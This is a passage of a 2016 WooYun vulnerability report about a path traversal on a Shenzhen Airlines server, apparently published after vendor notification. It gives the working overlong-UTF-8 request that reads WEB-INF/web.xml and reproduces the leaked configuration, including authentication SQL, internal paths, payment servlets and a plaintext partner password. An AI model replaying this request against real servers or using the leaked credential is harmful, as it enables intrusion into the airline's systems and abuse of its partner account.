1. 首页
  2. 乌云镜像
  3. 深圳航空java容器字符集解析不当导致任意文件遍历
作者:安三

深圳航空java容器字符集解析不当导致任意文件遍历

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-05-09: 细节已通知厂商并且等待厂商处理中
2016-05-11: 厂商已经确认,细节仅向厂商公开
2016-05-21: 细节向核心白帽子及相关领域专家公开
2016-05-31: 细节向普通白帽子公开
2016-06-10: 细节向实习白帽子公开
2016-06-25: 细节向公众公开

简要描述:

深圳航空java容器字符集解析不当导致任意文件遍历

详细说明:

#1 存在漏洞服务器

http://miaosha.shenzhenair.com

#2 漏洞地址

code 区域
http://miaosha.shenzhenair.com/%c0%ae/WEB-INF/web.xml





code 区域
<bean id="uiueGroupBuyingDao" title="com.iss.szair.b2c.uiue.groupBuying.dao.impl.GroupBuyingDaoImpl"/>

<bean id="groupBuyingBiz" title="com.iss.szair.b2c.uiue.groupBuying.bizlogic.impl.UiueGroupBuyingBiz">

<property name="groupBuyingDao">

<ref local="uiueGroupBuyingDao"/>

</property>

</bean>

<!--  ADD BY YUJIA NEB-625 20141117 END  -->

<!--  add by li-ji 20141112 NEB-625 机票团购-展示 start -->

<bean id="IShowPromotionDao" title="com.iss.szair.b2c.groupBuying.dao.impl.ShowPromotionDaoImpl"/>

<bean id="IShowPromotionBiz" title="com.iss.szair.b2c.groupBuying.bizlogic.impl.ShowPromotionBiz">

<property name="showPromotionDao">

<ref local="IShowPromotionDao"/>

</property>

</bean>

<bean id="IShowPromotionUiueDao" title="com.iss.szair.b2c.uiue.groupBuying.dao.impl.ShowPromotionUiueDaoImpl"/>

<bean id="IShowPromotionUiueBiz" title="com.iss.szair.b2c.uiue.groupBuying.bizlogic.impl.ShowPromotionUiueBiz">

<property name="showPromotionUiueDao">

<ref local="IShowPromotionUiueDao"/>

</property>

</bean>

<!--  add by li-ji 20141028 NEB-625 机票团购-展示end -->

<bean id="IAuctionPubBiz" title="com.iss.szair.b2c.auction.bizlogic.AuctionPubBiz">

<property name="auctionPubDao">

<ref local="IAuctionPubDao"/>

</property>

</bean>

<bean id="IAuctionPubDao" title="com.iss.szair.b2c.auction.dao.oracle.AuctionPubDaoImpl"></bean>

<bean id="IAuctionRecordBiz" title="com.iss.szair.b2c.auction.bizlogic.AuctionRecordBiz">

<property name="auctionRecordDao">

<ref local="IAuctionRecordDao"/>

</property>

</bean>

<bean id="IAuctionRecordDao" title="com.iss.szair.b2c.auction.dao.oracle.AuctionRecordDaoImpl"></bean>

<!--

 ==========================add by hlkang for auction========================== 

-->

<bean id="authenticationManager" title="org.acegisecurity.providers.ProviderManager">

<property name="providers">

<list>

<!--     <ref local="mybean"/> -->

<ref local="daoAuthenticationProvider"/>

<ref local="anonymousAuthenticationProvider"/>

</list>

</property>

</bean>

<bean id="anonymousProcessingFilter" title="org.acegisecurity.providers.anonymous.AnonymousProcessingFilter">

<property name="key">

<value>foobar</value>

</property>

<property name="userAttribute">

<value>anonymousUser,AUTH_ANONYMOUS</value>

</property>

</bean>

<bean id="daoAuthenticationProvider" title="org.acegisecurity.providers.dao.DaoAuthenticationProvider">

<property name="userDetailsService" ref="jdbcDaoImpl"/>

<property name="userCache">

<ref local="userCache"/>

</property>

<!-- if you  do not want encode password  -->

<property name="passwordEncoder" ref="passwordEncoder"/>

</bean>

<bean id="passwordEncoder" title="org.acegisecurity.providers.encoding.Md5PasswordEncoder"/>

<bean id="loggerListener" title="org.acegisecurity.event.authentication.LoggerListener"/>

<bean id="jdbcDaoImpl" title="org.acegisecurity.userdetails.jdbc.JdbcDaoImpl">

<property name="dataSource">

<ref bean="dataSource"/>

</property>

<property name="usersByUsernameQuery">

<value>

SELECT user_sAccount, User_sPassword,1 FROM Sys_user WHERE User_sAccount=?

</value>

<!--

<value>SELECT user_sAccount, User_sPassword,User_nIsEnabled FROM Sys_user WHERE User_sAccount=?</value>

-->

</property>

<property name="authoritiesByUsernameQuery">

<value>

select u.User_sAccount,auth.Auth_sName from Sys_AuthRole authrel,Sys_Auth auth,Sys_User u,Sys_OrgRelation rel1,Sys_PostRole rel2 WHERE u.User_sAccount = ? and u.User_sID=rel1.OrRe_sNode and rel1.OrRe_sParentNode=rel2.PoRo_sOrgNodeID and rel2.PoRo_sRoleID= authrel.AURO_SROLEID and auth.Auth_sID = authrel.AURO_SAUTHID

</value>

</property>

</bean>

 

漏洞证明:

 

code 区域
This XML file does not appear to have any style information associated with it. The document tree is shown below.

<web-app id="WebApp_1154401509359">

<context-param id="ContextParam_1233884491862">

<param-name>contextConfigLocation</param-name>

<param-value>

/WEB-INF/titlees/com/iss/config/FrontSpringConfig.xml

</param-value>

</context-param>

<filter id="Filter_1233884491863">

<filter-name>Character Encoding</filter-name>

<filter-title>com.iss.common.CharacterEncodingFilter</filter-title>

<init-param id="InitParam_1233884491863">

<param-name>encoding</param-name>

<param-value>GBK</param-value>

</init-param>

<init-param id="InitParam_1233884491864">

<param-name>ignore</param-name>

<param-value>true</param-value>

</init-param>

</filter>

<filter id="Filter_1233884491864">

<filter-name>B2g Login Manage</filter-name>

<filter-title>com.iss.b2g.common.LoginFilter</filter-title>

<init-param id="InitParam_1233884491865">

<param-name>encoding</param-name>

<param-value>GBK</param-value>

</init-param>

<init-param id="InitParam_1233884491866">

<param-name>ignore</param-name>

<param-value>true</param-value>

</init-param>

</filter>

<filter id="Filter_1233884491865">

<filter-name>B2a Login Manage</filter-name>

<filter-title>com.iss.b2g.common.LoginFilter</filter-title>

<init-param id="InitParam_1233884491867">

<param-name>encoding</param-name>

<param-value>GBK</param-value>

</init-param>

<init-param id="InitParam_1233884491868">

<param-name>ignore</param-name>

<param-value>true</param-value>

</init-param>

</filter>

<filter id="Filter_1379346676944">

<filter-name>ProductExtendFilter</filter-name>

<filter-title>com.iss.common.ProductExtendFilter</filter-title>

</filter>

<!-- add by jinqr 20140326 NEB-BUG316 安全漏洞 start  -->

<filter id="Filter_1233884491871">

<filter-name>IllegalCharacterFilter</filter-name>

<filter-title>com.iss.common.IllegalCharacterFilter</filter-title>

<init-param id="InitParam_1233884491871">

<param-name>characterParams</param-name>

<param-value>',",<,></param-value>

</init-param>

</filter>

<!-- add by jinqr 20140326 NEB-BUG316 安全漏洞 end  -->

<filter id="Filter_1379346676945">

<filter-name>AllUrlFilter</filter-name>

<filter-title>com.iss.common.filter.AllUrlFilter</filter-title>

<init-param id="InitParam_1379346676944">

<param-name>includeStrings</param-name>

<param-value>

select ;select%20;script;update ;update%20;delete ;delete%20;iframe;%20and%20

</param-value>

</init-param>

<init-param id="InitParam_1379346676945">

<param-name>redirectPath</param-name>

<param-value>/</param-value>

</init-param>

<init-param id="InitParam_1379346676946">

<param-name>disabletestfilter</param-name>

<param-value>N</param-value>

</init-param>

</filter>

<filter-mapping>

<filter-name>IllegalCharacterFilter</filter-name>

<url-pattern>/regist/userMgr.do</url-pattern>

</filter-mapping>

<filter-mapping id="FilterMapping_1379346676944">

<filter-name>AllUrlFilter</filter-name>

<url-pattern>/*</url-pattern>

</filter-mapping>

<filter-mapping id="FilterMapping_1379346676945">

<filter-name>ProductExtendFilter</filter-name>

<servlet-name>action</servlet-name>

</filter-mapping>

<filter-mapping id="FilterMapping_1379346676946">

<filter-name>ProductExtendFilter</filter-name>

<url-pattern>*.jsp</url-pattern>

</filter-mapping>

<filter-mapping id="FilterMapping_1233884491862">

<filter-name>B2g Login Manage</filter-name>

<url-pattern>/b2g/*</url-pattern>

</filter-mapping>

<filter-mapping id="FilterMapping_1233884491863">

<filter-name>B2a Login Manage</filter-name>

<url-pattern>/b2a/*</url-pattern>

</filter-mapping>

<filter-mapping id="FilterMapping_1233884491864">

<filter-name>Character Encoding</filter-name>

<servlet-name>action</servlet-name>

</filter-mapping>

<filter-mapping id="FilterMapping_1233884491878">

<filter-name>Character Encoding</filter-name>

<url-pattern>*.jsp</url-pattern>

</filter-mapping>

<listener id="Listener_1233884491878">

<listener-title>

org.springframework.web.util.IntrospectorCleanupListener

</listener-title>

</listener>

<listener id="Listener_1233884491879">

<listener-title>

org.springframework.web.context.ContextLoaderListener

</listener-title>

</listener>

<listener id="Listener_1233884491880">

<listener-title>

org.acegisecurity.ui.session.HttpSessionEventPublisher

</listener-title>

</listener>

<listener id="Listener_1233884491881">

<listener-title>com.iss.szair.b2g.account.action.ClientAccountCtrl</listener-title>

</listener>

<servlet id="Servlet_1233884439721">

<servlet-name>action</servlet-name>

<servlet-title>org.apache.struts.action.ActionServlet</servlet-title>

<init-param id="InitParam_1233884491878">

<param-name>config</param-name>

<param-value>

/WEB-INF/struts-config.xml,/WEB-INF/config/struts-config-system.xml ,/WEB-INF/config/example/struts-config-example.xml ,/WEB-INF/config/b2g/account/struts-config-account.xml ,/WEB-INF/config/b2g/advice/struts-config-advice.xml ,/WEB-INF/config/b2g/deposit/struts-config-deposit.xml ,/WEB-INF/config/b2g/query/struts-config-query.xml ,/WEB-INF/config/b2g/teamorder/struts-config-teamorder.xml ,/WEB-INF/config/hr/struts-config-hr.xml ,/WEB-INF/config/wap/struts-config-wap.xml ,/WEB-INF/config/b2a/outuser/struts-config-outuser.xml ,/WEB-INF/config/b2a/bSPReimburse/struts-config-bSPReimburseQ.xml ,/WEB-INF/config/b2a/bulletin/struts-config-bulletin.xml ,/WEB-INF/config/b2a/advice/struts-config-adviceB2a.xml ,/WEB-INF/config/b2a/agentorder/struts-config-agentorder.xml ,/WEB-INF/config/b2a/ticketStstusAlert/struts-config-ticketStstusAlert.xml ,/WEB-INF/config/b2a/Loan/struts-config-loan.xml ,/WEB-INF/config/b2a/pnr/struts-config-pnr.xml ,/WEB-INF/config/b2a/AgentReport/struts-config-agentReport.xml ,/WEB-INF/config/b2a/returnbill/struts-config-returnbill.xml ,/WEB-INF/config/b2a/manageTicket/struts-config-manageTicket.xml ,/WEB-INF/config/universiadeguess/struts-config-guess.xml ,/WEB-INF/config/secondbuy/struts-config-secondbuy.xml ,/WEB-INF/config/universiade/struts-config-universiadePhoto.xml ,/WEB-INF/config/awardsList/struts-config-awardsList.xml

<!--

 ,/WEB-INF/config/ticketBookingFlow/struts-config-ticketBookingFlow.xml 

-->

,/WEB-INF/config/coupon/struts-config-coupon.xml ,/WEB-INF/config/ddds/struts-config-ddds.xml ,/WEB-INF/config/voucher/struts-config-voucher.xml ,/WEB-INF/config/payinterface/struts-config-payinterface.xml ,/WEB-INF/config/activity/struts-config-activity.xml ,/WEB-INF/config/questionnaire/struts-config-questionnaire.xml ,/WEB-INF/config/checkIn/struts-config-checkIn.xml ,/WEB-INF/config/uiue/struts-config-uiue.xml ,/WEB-INF/config/internationalBooking/struts-config-internationalBooking.xml ,/WEB-INF/config/internationalBooking/struts-config-test-internationalBooking.xml ,/WEB-INF/config/checksession/struts-config-checksession.xml ,/WEB-INF/config/userManager/struts-config-um.xml ,/WEB-INF/config/groupBuying/struts-config-groupBuying.xml

</param-value>

</init-param>

<init-param id="InitParam_1233884491879">

<param-name>debug</param-name>

<param-value>2</param-value>

</init-param>

<init-param id="InitParam_1233884491880">

<param-name>detail</param-name>

<param-value>2</param-value>

</init-param>

<load-on-startup>2</load-on-startup>

</servlet>

<servlet id="Servlet_1233884439722">

<servlet-name>InitLog</servlet-name>

<servlet-title>com.iss.system.log.InitLog4j</servlet-title>

<init-param id="InitParam_1233884491881">

<param-name>log4j-config</param-name>

<param-value>\WEB-INF\log4j.properties</param-value>

</init-param>

<init-param id="InitParam_1233884491882">

<param-name>config-relative</param-name>

<param-value>true</param-value>

</init-param>

<init-param id="InitParam_1233884491883">

<param-name>property-relative</param-name>

<param-value>true</param-value>

</init-param>

<load-on-startup>4</load-on-startup>

</servlet>

<servlet id="Servlet_1233884439723">

<servlet-name>ContextServlet</servlet-name>

<servlet-title>com.iss.config.ContextServlet</servlet-title>

<init-param id="InitParam_1233884491884">

<param-name>DataSource</param-name>

<param-value>jdbc/shem</param-value>

</init-param>

<init-param id="InitParam_1233884491885">

<param-name>FareDataSource</param-name>

<param-value>jdbc/fare</param-value>

</init-param>

<init-param id="InitParam_1233894491885">

<param-name>CacheDataSource</param-name>

<param-value>jdbc/cache</param-value>

</init-param>

<init-param id="InitParam_1233884491886">

<param-name>GlobalMessageResource</param-name>

<param-value>resources.GlobalMessageResources</param-value>

</init-param>

<init-param id="InitParam_1233884491887">

<param-name>ROOT_PATH</param-name>

<param-value/>

</init-param>

<init-param id="InitParam_1233884491888">

<param-name>appServer</param-name>

<param-value>websphere</param-value>

</init-param>

<!--  START 2013/12/21 ADD BY LI JIAN 国际票打票机追加  -->

<init-param id="InitParam_6455257">

<param-name>IBE_INTER_PRINTER_NO</param-name>

<param-value>3</param-value>

</init-param>

<!--  END 2013/12/21 ADD BY LI JIAN 国际票打票机追加  -->

<init-param id="InitParam_645525701">

<param-name>IBE_INTER_PRINTER_NO_1</param-name>

<param-value>2</param-value>

</init-param>

<init-param id="InitParam_645525702">

<param-name>IBE_INTER_PRINTER_NO_2</param-name>

<param-value>9</param-value>

</init-param>

<init-param id="InitParam_645525703">

<param-name>IBE_INTER_PRINTER_NO_3</param-name>

<param-value>10</param-value>

</init-param>

<init-param id="InitParam_645525704">

<param-name>IBE_INTER_PRINTER_NO_4</param-name>

<param-value>13</param-value>

</init-param>

<!--  START 2014/4/10 ADD BY ZHANGJ 支付平台打票机追加  -->

<init-param id="InitParam_6455258">

<param-name>IBE_PAYMENTPLAT_PRINTER_NO_1</param-name>

<param-value>12</param-value>

</init-param>

<init-param id="InitParam_6455259">

<param-name>IBE_PAYMENTPLAT_PRINTER_NO_2</param-name>

<param-value>12</param-value>

</init-param>

<!--  END 2014/4/10 ADD BY ZHANGJ 支付平台打票机追加  -->

<init-param id="InitParam_1233884491889">

<param-name>IBE_B2C_PRINTER_NO</param-name>

<param-value>1</param-value>

</init-param>

<init-param id="InitParam_1233884491890">

<param-name>IBE_B2G_PRINTER_NO</param-name>

<param-value>3</param-value>

</init-param>

<init-param id="InitParam_1233884491891">

<param-name>IBE_B2A_PRINTER_NO</param-name>

<param-value>9</param-value>

</init-param>

<init-param id="InitParam_1233884491892">

<param-name>IBE_SYS_PRINTER_NO</param-name>

<param-value>1</param-value>

</init-param>

<init-param id="InitParam_1233884491893">

<param-name>IBE_B2C_REFOUND_PRINTER_NO</param-name>

<param-value>1</param-value>

</init-param>

<init-param id="InitParam_1233884491905">

<param-name>IBE_B2C_REFOUND_WF1_PRINTER_NO</param-name>

<param-value>4</param-value>

</init-param>

<init-param id="InitParam_1233884491906">

<param-name>IBE_B2C_REFOUND_WF2_PRINTER_NO</param-name>

<param-value>5</param-value>

</init-param>

<init-param id="InitParam_1233884491894">

<param-name>IBE_B2A_REFOUND_PRINTER_NO</param-name>

<param-value>1</param-value>

</init-param>

<init-param id="InitParam_1233884491895">

<param-name>IBE_B2G_REFOUND_PRINTER_NO</param-name>

<param-value>1</param-value>

</init-param>

<init-param id="InitParam_1233884491896">

<param-name>IBE_SYS_REFOUND_PRINTER_NO</param-name>

<param-value>1</param-value>

</init-param>

<!--

 add by bidi 2014-10-22 打票机轮巡出票功能,需要在发布前确认各平台打票机

         将所有打票机按平台区分后,以英文;进行分隔,填入各param-value中。

-->

<init-param id="InitParam_1233837519069">

<param-name>IBE_B2C_PRINTER_NOS</param-name>

<param-value>1;6</param-value>

</init-param>

<init-param id="InitParam_1233837519070">

<param-name>IBE_PASY_PRINTER_NOS</param-name>

<param-value>7;11;12;14;15;16;17;18;19;20;21;22;23</param-value>

</init-param>

<init-param id="InitParam_1233837519071">

<param-name>IBE_INTER_PRINTER_NOS</param-name>

<param-value>2</param-value>

</init-param>

<!--  end by bidi -->

<init-param id="InitParam_1233884491897">

<param-name>IBE_CONFIG</param-name>

<param-value>PRODUCTION</param-value>

</init-param>

<init-param id="InitParam_1233884491898">

<param-name>DOWNLOAD_DIR</param-name>

<param-value>

D:\IBM\WebSphere\AppServer\installedApps\WWW-SVR\szair.ear\szair.war\download\

</param-value>

</init-param>

<init-param id="InitParam_1233884491899">

<param-name>HTTP_DIR</param-name>

<param-value>/download/</param-value>

</init-param>

<init-param id="InitParam_1233884491903">

<param-name>EPSILON_URL</param-name>

<param-value>

http://custom-apac.epsiloninteractive.com/shenzhenair/raf/RAF_friend.php

</param-value>

</init-param>

<init-param id="InitParam_1233884491904">

<param-name>EPSILON_PASSWORD</param-name>

<param-value>p=toYq4DJ8</param-value>

</init-param>

<init-param id="InitParam_1233884491907">

<param-name>MAX_SENDCODETIMES</param-name>

<param-value>3</param-value>

</init-param>

<!--  ADD by yu.yu 20140325 NEB-283 B2C和电粉实现单点登录  START  -->

<init-param id="InitParam_1233884491908">

<param-name>DIANFEN_URL</param-name>

<param-value>http://ecfan.shenzhenair.com</param-value>

</init-param>

<!--  ADD by yu.yu 20140325 NEB-283 B2C和电粉实现单点登录   END  -->

<!--  add by li-ji 20141022 NEB-626 易来易往 start  -->

<!--  1易来易往产品启用;0易来易往产品停用  -->

<init-param id="InitParam_1233884491999">

<param-name>EASY_COME_EASY_GO_FLAG</param-name>

<param-value>1</param-value>

</init-param>

<!--  add by li-ji 20141022 NEB-626 易来易往 end  -->

<!--  易来易往舱位配置  -->

<init-param id="InitParam_1233884491988">

<param-name>YLYW_TCLASS_WF</param-name>

<param-value>S</param-value>

</init-param>

<!--  add by jinqr 20141208 NEB-659 联动P舱产品 start  -->

<init-param id="InitParam_1234884491999">

<param-name>LINKAGE_P_START</param-name>

<param-value>2015-03-09</param-value>

</init-param>

<init-param id="InitParam_1234884491968">

<param-name>LINKAGE_P_END</param-name>

<param-value>2015-12-31</param-value>

</init-param>

<init-param id="InitParam_1233884491978">

<param-name>LINKAGE_P_DISCOUNT_RANGE</param-name>

<param-value>30</param-value>

</init-param>

<!--  add by jinqr 20141208 NEB-659 联动P舱产品 end  -->

<init-param id="InitParam_1233884491991">

<param-name>SPECIAL_LINKAGE_P_START</param-name>

<param-value>2015-07-08</param-value>

</init-param>

<init-param id="InitParam_1233884491992">

<param-name>SPECIAL_LINKAGE_P_END</param-name>

<param-value>2015-08-24</param-value>

</init-param>

<init-param id="InitParam_1233884491993">

<param-name>SPECIAL_LINKAGE_P_DISCOUNT_RANGE</param-name>

<param-value>50</param-value>

</init-param>

<init-param id="InitParam_12338123491994">

<param-name>ADVANCE_BOOKING_DAYS</param-name>

<param-value>3</param-value>

</init-param>

<load-on-startup>1</load-on-startup>

</servlet>

<servlet id="Servlet_1233884439724">

<servlet-name>BankPayServlet</servlet-name>

<servlet-title>com.iss.szair.bank.BankPayServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439725">

<servlet-name>WapBankPayServlet</servlet-name>

<servlet-title>com.iss.szair.bank.WapBankPayServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439752">

<servlet-name>EPosPayServlet</servlet-name>

<servlet-title>com.iss.szair.bank.yeepay.epos.EPosPayServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439726">

<servlet-name>ABCB2CServlet</servlet-name>

<servlet-title>com.iss.szair.bank.abc.ABCB2CServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439727">

<servlet-name>AliPayB2CServlet</servlet-name>

<servlet-title>com.iss.szair.bank.alipay.AliPayB2CServlet</servlet-title>

</servlet>

<servlet id="Servlet_1243957839381">

<servlet-name>AliPayB2CServlet1</servlet-name>

<servlet-title>com.iss.szair.bank.alipay.AliPayB2CServlet1</servlet-title>

</servlet>

<servlet id="Servlet_1243957839382">

<servlet-name>GZUNIONB2CServlet</servlet-name>

<servlet-title>com.iss.szair.bank.gzunion.GZUNIONB2CServlet</servlet-title>

</servlet>

<servlet id="Servlet_1282032627900">

<servlet-name>QuickMoneyB2CServlet</servlet-name>

<servlet-title>com.iss.szair.bank.quickmpay.QuickMoneyB2CServlet</servlet-title>

</servlet>

<servlet id="Servlet_1282032627999">

<servlet-name>QuickMoneyCCServlet</servlet-name>

<servlet-title>

com.iss.szair.bank.quickmpay.cc.QuickMoneyCCServlet

</servlet-title>

</servlet>

<!--  add by xingjg NEB-80-社会化值机 start  -->

<servlet id="Servlet_1282032627980">

<servlet-name>PlatformLoginServlet</servlet-name>

<servlet-title>com.iss.szair.b2c.checkin.platform.LoginServlet</servlet-title>

</servlet>

<!--  add by xingjg NEB-80-社会化值机 end  -->

<servlet id="Servlet_1337167838755">

<servlet-name>WyzxB2CServlet</servlet-name>

<servlet-title>com.iss.szair.bank.wyzxen.WyzxB2CServlet</servlet-title>

</servlet>

<servlet id="Servlet_1282032627901">

<servlet-name>BOCOMB2CServlet</servlet-name>

<servlet-title>com.iss.szair.bank.bocom.BOCOMB2CServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439728">

<servlet-name>BCB2CServlet</servlet-name>

<servlet-title>com.iss.szair.bank.bc.BCB2CServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439729">

<servlet-name>CCBB2CServlet</servlet-name>

<servlet-title>com.iss.szair.bank.ccb.CCBB2CServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439730">

<servlet-name>CCBWapB2CServlet</servlet-name>

<servlet-title>com.iss.szair.bank.ccb.CCBWapB2CServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439731">

<servlet-name>CMBB2CServlet</servlet-name>

<servlet-title>com.iss.szair.bank.cmb.CMBB2CServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439732">

<servlet-name>CHINAPNRB2CServlet</servlet-name>

<servlet-title>com.iss.szair.bank.chinapnr.CHINAPNRB2CServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439733">

<servlet-name>CHINAPNRB2CServlet1</servlet-name>

<servlet-title>com.iss.szair.bank.chinapnr.CHINAPNRB2CServlet1</servlet-title>

</servlet>

<servlet id="Servlet_1233884439734">

<servlet-name>CHINAPNRMASB2CServlet</servlet-name>

<servlet-title>com.iss.szair.bank.chinapnr.CHINAPNRMASB2CServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439735">

<servlet-name>CHINAPNRMASB2CRefundServlet</servlet-name>

<servlet-title>

com.iss.szair.bank.chinapnr.CHINAPNRMASB2CRefundServlet

</servlet-title>

</servlet>

<servlet id="Servlet_1233884439736">

<servlet-name>ICBCB2CServlet</servlet-name>

<servlet-title>com.iss.szair.bank.icbc.ICBCB2CServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439737">

<servlet-name>SDBB2CServlet</servlet-name>

<servlet-title>com.iss.szair.bank.sdb.SDBB2CServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439738">

<servlet-name>SZSHPDB2CServlet</servlet-name>

<servlet-title>com.iss.szair.bank.spdb.SZSHPDB2CServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439739">

<servlet-name>SZUnionServlet</servlet-name>

<servlet-title>com.iss.szair.bank.szunion.SZUNIONB2CServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439740">

<servlet-name>YeePay2CServlet</servlet-name>

<servlet-title>com.iss.szair.bank.yeepay.YeePay2CServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439741">

<servlet-name>TenPayB2CServlet</servlet-name>

<servlet-title>com.iss.szair.bank.tenpay.TenPayB2CServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439742">

<servlet-name>SelectCityServlet</servlet-name>

<servlet-title>com.iss.szair.common.servlet.SelectCityServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439743">

<servlet-name>CrmScoreServlet</servlet-name>

<servlet-title>

com.oaking.shem.webservice.kingclub.CrmScoreServlet

</servlet-title>

</servlet>

<servlet id="Servlet_1233884439744">

<servlet-name>ChineseWordServlet</servlet-name>

<servlet-title>com.iss.szair.common.servlet.ChineseWordServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439745">

<servlet-name>AxisServlet</servlet-name>

<display-name>Apache-Axis Servlet</display-name>

<servlet-title>org.apache.axis.transport.http.AxisServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439746">

<servlet-name>AdminServlet</servlet-name>

<display-name>Axis Admin Servlet</display-name>

<servlet-title>org.apache.axis.transport.http.AdminServlet</servlet-title>

<load-on-startup>100</load-on-startup>

</servlet>

<servlet id="Servlet_1233884439747">

<servlet-name>SOAPMonitorService</servlet-name>

<display-name>SOAPMonitorService</display-name>

<servlet-title>org.apache.axis.monitor.SOAPMonitorService</servlet-title>

<init-param id="InitParam_1233884491900">

<param-name>SOAPMonitorPort</param-name>

<param-value>5001</param-value>

</init-param>

<load-on-startup>100</load-on-startup>

</servlet>

<servlet id="Servlet_1233884439748">

<servlet-name>Barbecue</servlet-name>

<servlet-title>net.sourceforge.barbecue.BarcodeServlet</servlet-title>

<load-on-startup>1</load-on-startup>

</servlet>

<servlet id="Servlet_1233884439749">

<servlet-name>AjaxServlet</servlet-name>

<servlet-title>com.shenzhenair.shem.gift.checkCardServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439750">

<servlet-name>dwr-invoker</servlet-name>

<display-name>DWR Servlet</display-name>

<servlet-title>uk.ltd.getahead.dwr.DWRServlet</servlet-title>

<init-param id="InitParam_1233884491901">

<param-name>debug</param-name>

<param-value>false</param-value>

</init-param>

<init-param id="InitParam_1233884491902">

<param-name>crossDomainSessionSecurity</param-name>

<param-value>false</param-value>

</init-param>

<load-on-startup>10</load-on-startup>

</servlet>

<servlet id="Servlet_1233884439751">

<servlet-name>SearchEngineServlet</servlet-name>

<display-name>Search Engine Servlet</display-name>

<servlet-title>com.szair.common.SearchEngineServlet</servlet-title>

</servlet>

<servlet id="Servlet_1233884439753">

<servlet-name>BarcodeServlet</servlet-name>

<servlet-title>org.krysalis.barcode4j.servlet.BarcodeServlet</servlet-title>

</servlet>

<servlet id="Servlet_9082011072202">

<servlet-name>FindPasswordServlet</servlet-name>

<servlet-title>

com.iss.szair.b2c.regist.servlet.FindPasswordServlet

</servlet-title>

</servlet>

<servlet id="Servlet_9282011072202">

<servlet-name>ValidateUserServlet</servlet-name>

<servlet-title>

com.iss.szair.b2c.regist.servlet.ValidateUserServlet

</servlet-title>

</servlet>

<servlet id="Servlet_1233884439754">

<servlet-name>BarcodeErrorServlet</servlet-name>

<servlet-title>org.krysalis.barcode4j.webapp.BarcodeErrorServlet</servlet-title>

</servlet>

<servlet id="Servlet_1282032627902">

<servlet-name>TejiaMailBookServlet</servlet-name>

<servlet-title>com.szair.common.TejiaMailBookServlet</servlet-title>

</servlet>

<servlet id="Servlet_image">

<servlet-name>CheckImageServlet</servlet-name>

<servlet-title>com.iss.szair.common.servlet.CheckImageServlet</servlet-title>

</servlet>

<!--  邮政储蓄支付处理Servlet	add by SunC  -->

<servlet id="Servlet_1282032627904">

<servlet-name>PSBCB2CServlet</servlet-name>

<servlet-title>com.iss.szair.bank.psbc.PSBCB2CServlet</servlet-title>

</servlet>

<!--

 ADD By li-jun-neu 20140126 NEB-93 B2C 使用支付平台接口 Start 

-->

<servlet id="Servlet_6455259">

<servlet-name>PaymentServlet</servlet-name>

<servlet-title>

com.iss.scm.returnbill.payment.servlet.PaymentPlantServlet

</servlet-title>

</servlet>

<!--  ADD By li-jun-neu 20140126 NEB-93B2C 使用支付平台接口 End  -->

<!--  pujian payinterface  -->

<servlet id="Servlet_6455257">

<servlet-name>PaymentGuoNeiPlantServlet</servlet-name>

<servlet-title>

com.iss.szair.b2c.payinterface.payment.servlet.PaymentGuoNeiPlantServlet

</servlet-title>

</servlet>

<servlet id="Servlet_6455258">

<servlet-name>PaymentGuoNeiPlantNotifyServlet</servlet-name>

<servlet-title>

com.iss.szair.b2c.payinterface.payment.servlet.PaymentGuoNeiPlantNotifyServlet

</servlet-title>

</servlet>

<servlet id="Servlet_64552590">

<servlet-name>NewAPINotifyServlet</servlet-name>

<servlet-title>

com.iss.szair.b2c.payinterface.payment.servlet.NewAPINotifyServlet

</servlet-title>

</servlet>

<servlet id="Servlet_6455255">

<servlet-name>PaymentPlantServlet</servlet-name>

<servlet-title>

com.iss.szair.b2c.internationalBooking.payment.servlet.PaymentPlantServlet

</servlet-title>

</servlet>

<servlet id="Servlet_6455256">

<servlet-name>PaymentPlantNotifyServlet</servlet-name>

<servlet-title>

com.iss.szair.b2c.internationalBooking.payment.servlet.PaymentPlantNotifyServlet

</servlet-title>

</servlet>

<!--

 ADD By zhangchunyu 20140825 NEB-544 B2C系统机票验真功能增加有效校验与查询限制 Start 

-->

<servlet id="Servlet_1282032627905">

<servlet-name>RandomImgServlet</servlet-name>

<servlet-title>com.iss.szair.common.servlet.RandomImgServlet</servlet-title>

</servlet>

<!--

 ADD By zhangchunyu 20140825 NEB-544 B2C系统机票验真功能增加有效校验与查询限制 END 

-->

<servlet id="Servlet_1282032627998">

<servlet-name>CheckImageServlet3D</servlet-name>

<servlet-title>com.iss.szair.common.servlet.CheckImageServlet3D</servlet-title>

</servlet>

<servlet id="Servlet_1282032627907">

<servlet-name>CheckImageServlet3DNew</servlet-name>

<servlet-title>

com.iss.szair.common.servlet.CheckImageServlet3DNew

</servlet-title>

</servlet>

<servlet id="Servlet_1282032627909">

<servlet-name>InterCheckImageServlet3D</servlet-name>

<servlet-title>

com.iss.szair.b2c.internationalBooking.common.InterCheckImageServlet3D

</servlet-title>

</servlet>

<servlet id="Servlet_1282032627911">

<servlet-name>SavePriceServlet</servlet-name>

<servlet-title>com.iss.szair.common.servlet.SavePriceServlet</servlet-title>

</servlet>

<!--  add by yudx 20141204 neb-536 官网UIUIE快捷支付 start  -->

<servlet id="Servlet_64552591">

<servlet-name>PaymentUiueNotifyServlet</servlet-name>

<servlet-title>

com.iss.szair.b2c.uiue.servlet.PaymentUiueNotifyServlet

</servlet-title>

</servlet>

<servlet id="Servlet_64552601">

<servlet-name>PaymentUiueReturnServlet</servlet-name>

